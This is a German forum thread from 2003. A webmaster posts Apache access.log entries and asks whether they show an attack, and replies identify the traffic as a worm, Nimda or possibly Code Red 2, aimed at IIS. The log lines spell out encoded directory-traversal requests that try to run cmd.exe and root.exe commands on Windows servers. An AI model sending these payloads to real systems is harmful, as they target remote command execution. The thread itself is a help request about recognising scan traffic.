Hallo alle zusammen,
habe in der access.log folgende Einträge zu stehen:
217.162.231.145 - - [24/May/2003:03:30:51 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 270
217.162.231.145 - - [24/May/2003:03:30:51 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 268
217.162.231.145 - - [24/May/2003:03:30:51 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 278
217.162.231.145 - - [24/May/2003:03:30:51 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 278
217.162.231.145 - - [24/May/2003:03:30:51 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
217.162.231.145 - - [24/May/2003:03:30:51 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
217.162.231.145 - - [24/May/2003:03:30:51 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
217.162.231.145 - - [24/May/2003:03:30:51 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325
217.162.231.145 - - [24/May/2003:03:30:51 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
217.162.231.145 - - [24/May/2003:03:30:51 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
217.162.231.145 - - [24/May/2003:03:30:51 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
217.162.231.145 - - [24/May/2003:03:30:52 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
217.162.231.145 - - [24/May/2003:03:30:52 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275
217.162.231.145 - - [24/May/2003:03:30:52 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275
217.162.231.145 - - [24/May/2003:03:30:52 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
217.162.231.145 - - [24/May/2003:03:30:52 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292
Diese wiederholen sich jeden Tag zur etwa gleichen Zeit. Kann mir vielleicht jemand sagen, was das zu bedeuten hat? Ist das ein Angriff? Und denkt dieser eventuelle Angreifer er hätte einen ISII vor sich (statt Apache 1&1-Server)?
Für jeden Tip dankbar.
Gruß,
Paul
Einträge in access.log
Re: Einträge in access.log
Das ist kein Angreifer, sonder neun Wurm, der wohl ohne Wissen des Besitzers sein Unwesen treibt. In dem Falle ist es "Nimda". Brauchst dir keine Sorgen machen, dieser Wurm kann bei dir keinen Schaden anrichten.
http://www.symantec.com/avcenter/venc/d ... .a@mm.html
http://www.symantec.com/avcenter/venc/d ... .a@mm.html
Re: Einträge in access.log
Würde sagen, dass ist Code Red 2, der versucht einen ISS anzugreifen.
Brauchst dir also keine Gedanken zu machen.
Brauchst dir also keine Gedanken zu machen.
Re: Einträge in access.log
Oh, vielen Dank für die schnelle Antwort. Mich hat nur gewundert, daß das Teil immer wieder versucht den Server anzugreifen. Puhh.
Gruß,
Paul
Gruß,
Paul